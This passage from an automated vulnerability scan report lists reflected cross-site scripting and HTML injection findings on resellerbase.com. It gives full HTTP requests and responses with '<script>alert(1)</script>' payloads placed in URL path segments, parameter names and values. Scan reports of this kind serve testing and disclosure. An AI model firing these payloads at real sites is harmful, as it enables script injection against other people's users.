GET /detail/4/themes/search.php?keyword=search...a1d46<a>4a4949183b7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...a1d46<a>4a4949183b7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2812. http://www.resellerbase.com/detail/4/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 33e39<script>alert(1)</script>0c38dfab204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2&33e39<script>alert(1)</script>0c38dfab204=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2&33e39<script>alert(1)</script>0c38dfab204=1 was not found on this server.</p>
...[SNIP]...

2.2813. http://www.resellerbase.com/detail/4/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ea70f<a>60923432601 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2ea70f<a>60923432601 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2ea70f<a>60923432601 was not found on this server.</p>
...[SNIP]...

2.2814. http://www.resellerbase.com/detail/40/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56b5e<script>alert(1)</script>12c90c48908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail56b5e<script>alert(1)</script>12c90c48908/40/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail56b5e<script>alert(1)</script>12c90c48908/40/ was not found on this server.</p>
...[SNIP]...

2.2815. http://www.resellerbase.com/detail/40/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5e539<script>alert(1)</script>3b85b19cf7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/405e539<script>alert(1)</script>3b85b19cf7c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/405e539<script>alert(1)</script>3b85b19cf7c/ was not found on this server.</p>
...[SNIP]...

2.2816. http://www.resellerbase.com/detail/40/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d9e2<script>alert(1)</script>5b8bbfaa25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/?3d9e2<script>alert(1)</script>5b8bbfaa25=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/?3d9e2<script>alert(1)</script>5b8bbfaa25=1 was not found on this server.</p>
...[SNIP]...

2.2817. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 827ed<script>alert(1)</script>fac82712a5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail827ed<script>alert(1)</script>fac82712a5e/40/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail827ed<script>alert(1)</script>fac82712a5e/40/rating.php was not found on this server.</p>
...[SNIP]...

2.2818. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da45b<script>alert(1)</script>bc6fb96243eb7c4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailda45b<script>alert(1)</script>bc6fb96243eb7c4e6/40/rating.php?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailda45b<script>alert(1)</script>bc6fb96243eb7c4e6/40/rating.php?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2819. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f624<script>alert(1)</script>d6d80fa3ca1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/407f624<script>alert(1)</script>d6d80fa3ca1/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/407f624<script>alert(1)</script>d6d80fa3ca1/rating.php was not found on this server.</p>
...[SNIP]...

2.2820. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fea98<script>alert(1)</script>124a6410c066aefce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/40fea98<script>alert(1)</script>124a6410c066aefce/rating.php?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40fea98<script>alert(1)</script>124a6410c066aefce/rating.php?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2821. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af035<script>alert(1)</script>4d753b5d2baaf3459 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/40/rating.phpaf035<script>alert(1)</script>4d753b5d2baaf3459?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.phpaf035<script>alert(1)</script>4d753b5d2baaf3459?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2822. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71d7f<script>alert(1)</script>193216f85cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/rating.php71d7f<script>alert(1)</script>193216f85cd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.php71d7f<script>alert(1)</script>193216f85cd was not found on this server.</p>
...[SNIP]...

2.2823. http://www.resellerbase.com/detail/40/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70629<script>alert(1)</script>83a53162f2251462f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/40/rating.php/70629<script>alert(1)</script>83a53162f2251462f?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.php/70629<script>alert(1)</script>83a53162f2251462f?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2824. http://www.resellerbase.com/detail/40/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9cd8e<script>alert(1)</script>049aedf0237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/rating.php?9cd8e<script>alert(1)</script>049aedf0237=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.php?9cd8e<script>alert(1)</script>049aedf0237=1 was not found on this server.</p>
...[SNIP]...

2.2825. http://www.resellerbase.com/detail/40/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9abe1<script>alert(1)</script>ed0ddc42e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9abe1<script>alert(1)</script>ed0ddc42e53/40/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9abe1<script>alert(1)</script>ed0ddc42e53/40/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2826. http://www.resellerbase.com/detail/40/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84430<script>alert(1)</script>74544717e9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4084430<script>alert(1)</script>74544717e9e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4084430<script>alert(1)</script>74544717e9e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2827. http://www.resellerbase.com/detail/40/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af1f3<script>alert(1)</script>8e76736833e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/search.phpaf1f3<script>alert(1)</script>8e76736833e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.phpaf1f3<script>alert(1)</script>8e76736833e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2828. http://www.resellerbase.com/detail/40/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c002c<a>798f8e8cc43 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/search.php?keyword=search...&Submit3=Searchc002c<a>798f8e8cc43&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...&Submit3=Searchc002c<a>798f8e8cc43&opt=2 was not found on this server.</p>
...[SNIP]...

2.2829. http://www.resellerbase.com/detail/40/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c5a2d<a>696cc3e89c3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/search.php?keyword=search...c5a2d<a>696cc3e89c3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...c5a2d<a>696cc3e89c3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2830. http://www.resellerbase.com/detail/40/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
